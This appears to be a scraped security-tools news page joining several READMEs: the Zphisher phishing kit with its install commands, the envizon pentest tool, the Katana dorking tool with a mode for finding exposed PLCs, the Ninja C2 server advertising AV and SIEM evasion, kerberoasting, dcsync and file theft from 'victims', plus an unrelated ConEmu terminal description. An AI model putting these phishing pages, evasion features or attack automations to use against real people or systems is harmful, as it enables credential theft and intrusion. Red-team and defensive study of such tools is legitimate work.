Zphisher - Automated Phishing Tool


Zphisher is an upgraded form of Shellphish. The main source code is from Shellphish . But I have not fully copied it . I have upgraded it & cleared the Unnecessary Files . Zphisher has 37 Phishing Page Templates ; including Facebook , Twitter & Paypal . It also has 4 Port Forwarding Tools . You can Find the Templates HERE

[+] Installation :
  • apt update
  • apt install git php openssh curl -y
  • git clone https://github.com/htr-tech/zphisher
  • cd zphisher
  • chmod +x zphisher.sh
  • bash zphisher.sh

Or ; Use Single Command
apt update && apt install git php curl openssh -y && git clone https://github.com/htr-tech/zphisher && cd zphisher && chmod +x zphisher.sh && bash zphisher.sh

[+] Credits :
[~] Some of the script is taken from Shellphish by thelinuxchoice .
[~] Some Phishing Pages are Generated by DarksecDevelopers ; UndeadSec ; thelinuxchoice& suljot_gjoka

[+] Features :
[+] Latest Login Pages !
[+] New Instagram Auto Follower Page !
[+] All types of Bugs Fixed !
[+] Useful for Beginners !

[+] Find Me on :
[~] Facebook
[~] Instagram
[~] Github

Envizon v3.0 - Network Visualization And Vulnerability Management/Reporting


This tool is designed, developed and supported by evait security. In order to give something back to the security community, we publish our internally used and developed, state of the art network visualization and vulnerability reporting tool, 'envizon'. We hope your feedback will help to improve and hone it even further.


Use Case
We use envizon for our pentests in order to get an overview of a network and quickly identify the most promising targets. The version 3.0 introduce new features such as screenshotting web services, organizing vulnerabilities or generating reports with custom docx templates.

Core Features:
  • Scan networks with predefined or custom nmap queries
  • Order clients with preconfigured or custom groups
  • Search through all attributes of clients and create complex linked queries
  • Get an overview of your targets during pentests with predefined security labels
  • Screenshot Visualize all http-like applications of your targets using chrome-headless (selenium) - VNC soon™
  • Save and reuse your most used nmap scans
  • Collaborate with your team on the project in realtime
  • Export selected clients in a text file to connect other tools fast
  • Manage issue template and create vulnerabilities linked to hosts in the database
  • Create customer reports with docx templates with one click

How to start?!
To avoid compatibility and dependency issues, and to make it easy to set up, we use Docker. You can build your own images or use prebuilt ones from Docker Hub.

Using Docker
Docker and Docker Compose are required.

Prebuilt Docker Images
Use the docker-compose.yml from the docker/envizon_prod directory and run it with docker-compose up.
The Docker image will be pulled from evait/envizon.
If you want to update the app image or pull it manually, you can do so with docker pull evait/envizon.
If you want to provide your own SSL-certificates, modify the docker-compose.yml according to your needs, otherwise they will be generated.
For the lazy ones:
wget https://raw.githubusercontent.com/evait-security/envizon/master/docker/envizon_prod/docker-compose.yml
echo SECRET_KEY_BASE="$(echo $(openssl rand -hex 64) | tr -d '\n')" > .envizon_secret.env
sudo docker-compose up

Running from local git checkout
git clone https://github.com/evait-security/envizon
cd envizon/docker/envizon_local
echo SECRET_KEY_BASE="$(echo $(openssl rand -hex 64) | tr -d '\n')" > .envizon_secret.env
sudo docker-compose up

If, for whatever reason, you want to run the development environment in production, you should probably consider changing the secrets in config/secrets.yml, and maybe even manually activate SSL.
git clone https://github.com/evait-security/envizon
cd envizon/docker/envizon_dev
sudo docker-compose up


Set a password
After starting the docker images go to: https://localhost:3000/ (or http://localhost:3000 if not using SSL)
You have to specify a password for your envizon instance. You can change it in the settings interface after logging in.

Scan interface
On the scan interface you can run a new network scan with preconfigured parameters or your own nmap fu. You also have the possibility to upload previously created nmap scans (with the -oX parameter).
The scans are divided into smaller ones automatically to reduce the waiting time for results.
To specify scan destinations, you can use host names or IP addresses. IP addresses can be specified with or without subnet mask or CIDR prefix. To specify ranges, the individual parts of the IP can be separated with - or ,. These can be combined as desired. If the range is written out in full, only a - is permitted. Possible values as targets are:


The group interface is the heart of envizon. You can select, group, order, quick search, global search, move, copy, delete and view your clients. The left side represents the group list. If you click on a group you will get a detailed view in the center of the page with the group content. Each client in a group has a link. By clicking on the IP address you will get a more detailed view on the right side with all attributes, labels, ports and nmap output.
Most of the buttons and links have tooltips.

Global Search
In this section you can search for nearly anything in the database and combine each search parameter with 'AND', 'OR' & 'NOT'.
Perform simple queries for hostname, IP, open ports, etc. or create combined queries like: hostname contains 'win' AND mac address starts with '0E:5C' OR has port 21 and 22 open. The portlist provides the port count for all clients and lets you quickly identify rarely used ports.

This page renders the images of all ports with visible/interactive content captured by starting a new scan on the images/scan-interface. Actually only web-services are converted into a PNG files using selenium and chrome-headless. The scan interface has two functions:
  • Re-Scan (check which port can be captured and add only new images)
  • Re-Scan with overwrite (delete all images from the database and take a screenshot from all possible ports)
Using the left groups sidebar you can filter all images by group. Please note, that any on-change updates (e.g. someone deletes a group) are disabled on this page to avoid any disturbance on the manual image reviewing process.

Vulnerabilty management and reporting
In the templates section you can create issue templates you want to reuse for your reports. You can set a title, severity, description, rating and recommendation. In the reports section you are able to create reports for your customers. First, you have to create an issue group for example "Internal network". In this group you can create new issues with the content of your issue templates and link them to existing clients in the database. You can easily add screenshots as proofs for your findings by using CTRL + v and pressing "update". The templates are linked to the new issues and can be updated with one click. Under edit current report you can edit basic information about the report itself for example the name of the customer or a management summary. The presentation mode allows you to hide all items exept the issues and their screenshots.
In order to create a great looking report you have to edit the docx template file under ./report-templates/envizon_template.docx. All variables used are included in the default template.

Import / Export
The complete project / database can be exported in the settings.
To import an exported zip file, you can select and upload it in the settings as well.
NOTE: This will overwrite any data in your current project, including all stored images!
Importing an exported project creates a temporary file in your envizon container, which will be only fully imported once your container has been restarted! This can be achieved by running docker-compose restart envizon. An additional backup of the previous PostgreSQL will be created and placed in the db subfolder in your envizon container at this point.

API ?!
  • Currently not. We will work on it. Maybe.
Which browsers are supported?
  • Latest Chrome / Chromium / Inox & Firefox / Waterfox / Librewolf.
Why rails?!
  • Wanted to learn ruby. It's cool.
Why so salty on github issue discussion?
  • This is a community project. We are a full time pentesting company and will not go into / care about every open issue that doesn't match our template or guidelines. If you get a rough answer or picture e.g. from a fully underwhelmed cat, you probably deserved it.

What frameworks and tools were used?

Of course you can open an issue and describe the problem you are facing with. Our team will try to response soon™.

Katana - A Python Tool For Google Hacking


Katana-ds (ds for dork_scanner) is a simple python tool that automates Google Hacking/Dorking and support Tor
It becomes more powerful in combination with GHDB

Installation :
Use the package manager pip to install requirements
cd Katana
python3 pip install -r requirments
python3 katana-ds.py

Tested on WindowsConEmu

Usage :
cd Katana
python3 katana-ds.py -h (for help)
Options :
-g :for google mode
-s :for scada mode
-t :for tor mode
-p :for proxy mode
-b :for bitly mode

Google Mode :
Google mode gives you 2 inputs the "Dork" and the "TLD" (Top Level Domain) that gives you ability to search in specific countries.
e.g : com for Usa / co.ma for Morocoo / be for Belgium
For more please see the included TLDs.txt file.

Scada Mode :
Scada mode search in google for online PLCs this actually use multiple requests so your ip will be blocked by Google so changing the TLD will solve the probleme and the script provides inputs for that.
-!> this is just an example actually it shows a lot of results

Example of Allen-Bradley PLC dashboard found using Scada Mode

Tor Mode :
Tor mode gives you 1 input wich is the search query but before you should have tor proxy running on port 9050 this time there is no ip blocking the script search in 3 tor search engines Phobos,Tor66 and Tordex (more will be added)
-!> this is just an example actually it shows a lot of results

What if :
  • The script print 'Error too many requests' : change the TLD
  • Changing the TLD don't work : change your ip by disconnecting and reconnecting again
  • Tor mode show 'Failed to establish a new connection' : make sure that tor proxy up and running on port 9050

Proxy Mode :
Proxy mode find proxy servers and print them it will print 25 Different Proxy server Each time

Bitly Mode : (In Development)
Find intersting shorted links that somtimes lead to intersting website pages the script print currently 10 bitly links with their responses (script still in development if you got connection error or so many 404,403 just run it again)

Special thanks to :
LuongPhuHoa for the Recommendation

RapidPayload - Metasploit Payload Generator

Ninja - Open Source C2 Server Created For Stealth Red Team Operations


Ninja C2 is an Open source C2 server created by Purple Team to do stealthy computer and Active directoty enumeration without being detected by SIEM and AVs , Ninja still in beta version and when the stable version released it will contains many more stealthy techinques and anti-forensic to create a real challenge for blue team to make sure all the defenses configured correctly and they can detect sophisticated attacks.
Ninja use python to server the payload and control the agents . the agents are based on C# and powershell which can bypass leading AVs . Ninja comunicate with the agents in secure channel encrpyted with AES-256 and the key is not hard coded but randomly generated on the campaign start , every agent connect to the C2 get the key and if the C2 restarted a new key will be used by all old agents and the new. Ninja also randomize the callback URLs for every campaign to bypass static detection.
  1. The main feature in Ninja is called DA ( Defense Analysis ), which will do the required enumeration to get below important information and do analysis on them to get score for system defenses and sandbox detection .
  2. Detect SIEM solutions : right now it detect SPlUNK , Log beat collector , sysmon.
  3. detect AV using two ways , using powershell command and using processes.
  4. check if the powershell logging enabled
  5. check if the user have admin privileges
  6. provide information about system : host name , OS , build number , local time , time zone , last boot and bios .
  7. provide information about the installed security updates.
  8. provide a System pwn hardness score based on multiple factors.
  9. provide a sandbox detection score based on ( privileges , bios manufacturer , joined to domain or not , existence of sysinternals processes ).
  10. show all domain users ( using powershell commands ).
  11. show all domain groups ( using powershell commands ) .
  12. show all domain computers ( using powerview.ps1 - taken from : https://github.com/PowerShellEmpire/PowerTools/blob/master/PowerView/powerview.ps1 ).
  13. show available shares.
Ninja is designed to be easy to setup and to add more commands and do automation for boring tasks. you can find many short commands that a red teamer struggle to memorize and search for them. please check this article to know more about ninja : https://shells.systems/introducing-ninja-c2-the-c2-built-for-stealth-red-team-operations/

Ninja key features
Ninja is packed with a number of features that allows you to gain an insight into your upcoming engagement before you actually need to deploy your full aresenal or tools and techniques, such as:
  • Defense Analysis
  • automation for kerberoast attack from generating the kerberos tickets to extracting the SPN hashes into hashcat format.
  • automation for dc_sync to get hashes for a list of users or domain admin group.
  • Undetected Automation to get groups the user belong to and the users member in a group.
  • Automation for bloodhound AD data collection .
  • customized c# payloads that encrypt strings to bypass static detection.
  • encode any command you want to unicode base64 to be used in powershell encoded commands.
  • full encryption of all communications between Agent and command and control to bypass AV and IPS detection.
  • dynamic URLs for all function , just place your list of url names and the c2 will use it randomly to bypass any static detection.
  • get random encryption key on the fly ( not hard coded ) every time the agent connect ( even reconnection needs a new key )
  • take screenshots and send it encrypted to C2
  • upload files from C2 to victim encrypted to bypass AV and IPS
  • download files from the victim encrypted to bypass AV and IPS
  • staged payloads to bypass detection ( base64 and base52 )
  • bypasses AVs ( tested on kaspersky and trendmicro )
  • Bypasses SIEM detection ( tested on splunk collecting usual event logs along with sysmon logs ) not tested on powershell v5 script block and module logging ( will be done in the next release ).
  • set the beacon interval dynamically even after the agent connected and provide a starting beacon interval in the campaign start configurations
  • logging for all commands and results in order to return to any data you missed in your operation.
  • set the configuration one time when you start the campaign and enjoy.
  • global kill switch to end campaigns.
  • delete table entries.
  • all the payload written to payloads folder for easy access and further customization.
  • easy to add automation for any command you want.

please note that compling C# depends on the System.Management.Automation.dll assembly with SHA1 hash c669667bb4d7870bc8bb65365d30071eb7fb86fe.
Some Ninja Commands require below modules ( already exist in modules ) which you need to get updates from their repo :
Invoke-Kerberoast : https://raw.githubusercontent.com/xan7r/kerberoast/master/autokerberoast.ps1
Invoke-Mimikatz : https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-Mimikatz.ps1
Sharphound : https://github.com/BloodHoundAD/BloodHound/blob/master/Ingestors/SharpHound.ps1
PowerView : https://github.com/PowerShellEmpire/PowerTools/blob/master/PowerView/powerview.ps1

First of all make sure to download the latest version of Ninja using the following command :
git clone https://github.com/ahmedkhlief/Ninja/
You need to setup Ninja by running install.sh script :
chmod +x ./install.shsudo ./install.sh
After that you need to initialize the campagin :
python start_campaign.py
Now you can start the Ninja server :
python Ninja.py
You will by greeted with the following once you run it :

88 88
"" ""
88888 8888
8b,dPPYba, 88 8b,dPPYba, 88 ,adPPYYba, 88 88 88
88P' `"8a 88 88P' `"8a 88 "" `Y8 88 88
88 88 88 88 88 88 ,adPPPPP88 88 88
88 88 88 88 88 88 88, ,88 88 88
88 88 88 88 88 88 `"8bbdP"Y8 88 88
,88 88888 888888
V1.0.1 BETA !

Ninja C2 | Stealthy Pwn like a Ninja

Command Description
------- ----------- exit Exit the console , or kill the agent
list List all agents
help Help menu
show Show Command and Controler variables
use Interact with AGENT
back Back to the main
payload Show Payloads
load load modules
kill_all kill all agents
delete delete agent from the list
delete_all delete all agents in the list
set-beacon set the beacon interval live for agent
download download file from the vicitm
downloads list downloaded files
upload upload files to the victim
modules list all the Available modules in Modules directory
encode64 encode any command to base64 encoded UTF-8 command ( can be decoded in powershell)
screenshot take screenshot form the victim
DA Run defense Analysis Module
kerb do kerberoast attack and dump service accounts hashes
dcsync_admins do dcsync attack agains domain admins group
dcsync_list do dcsync attack agains custom user list
get_groups get all the groups user is member of
get_users get all the users member in group
bloodhound run bloodhound to collect all the information about the AD

Please check this article about Ninja and how to use it : https://shells.systems/introducing-ninja-c2-the-c2-built-for-stealth-red-team-operations/.

  • Enhance DA module and add more SIEM , AV and sandbox detection along with more important eenumeration data.
  • more focus on stealth to load agent parts only when needed
  • add more shortend commands for popular modules
  • add more customizations and ideas for phishing using C# payloads and macros
  • integration with curveball exploit
  • integration with new exchange RCE
  • Undetectable Persistence
  • create a wipe command to securly remove files on hard disk without being detected and analyzed by blue team.
  • make the agent blocks changes randomly to bypass any static detection
  • add obfuscation for the agents.
  • integrate cobalt strike payloads

Main Screen


Agent List





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ConEmu - Customizable Windows Terminal With Tabs, Splits, Quake-Style, Hotkeys And More


ConEmu-Maximus5 is a Windows console emulator with tabs, which represents multiple consoles as one customizable GUI window with various features.
Initially, the program was created as a companion to Far Manager, my favorite shell replacement - file and archive management, command history and completion, powerful editor.
Today, ConEmu can be used with any other console application or simple GUI tools (like PuTTY for example). ConEmu is an active project, open to suggestions.

Some links
Wiki: https://conemu.github.io/en/TableOfContents.html
What's new: https://conemu.github.io/en/Whats_New.html
Release stages: https://conemu.github.io/en/StableVsPreview.html
Donate this project: https://conemu.github.io/donate.html

ConEmu starts a console program in hidden console window and provides an alternative customizable GUI window with various features:
  • smooth window resizing;
  • tabs and splits (panes);
  • easy run old DOS applications (games) in Windows 7 or 64bit OS (DosBox required);
  • quake-style, normal, maximized and full screen window graphic modes;
  • window font anti-aliasing: standard, clear type, disabled;
  • window fonts: family, height, width, bold, italic, etc.;
  • using normal/bold/italic fonts for different parts of console simultaneously;
  • cursor: standard console (horizontal) or GUI (vertical);
  • and more, and more...

Far Manager related features
  • tabs for editors, viewers, panels and consoles;
  • thumbnails and tiles;
  • show full output (1K+ lines) of last command in editor/viewer;
  • customizable right click behaviour (long click opens context menu);
  • drag and drop (explorer style);
  • and more, and more...
All settings are read from the registry or ConEmu.xml file, after which the command line parameters are applied. You may easily use several named configurations (for different PCs for example).

  • Windows 2000 or later.

In general, ConEmu installation is easy. Just unpack or install to any folder and run ConEmu.exe.
Read Installation wiki about release stages, distro packets, some warnings and much more...

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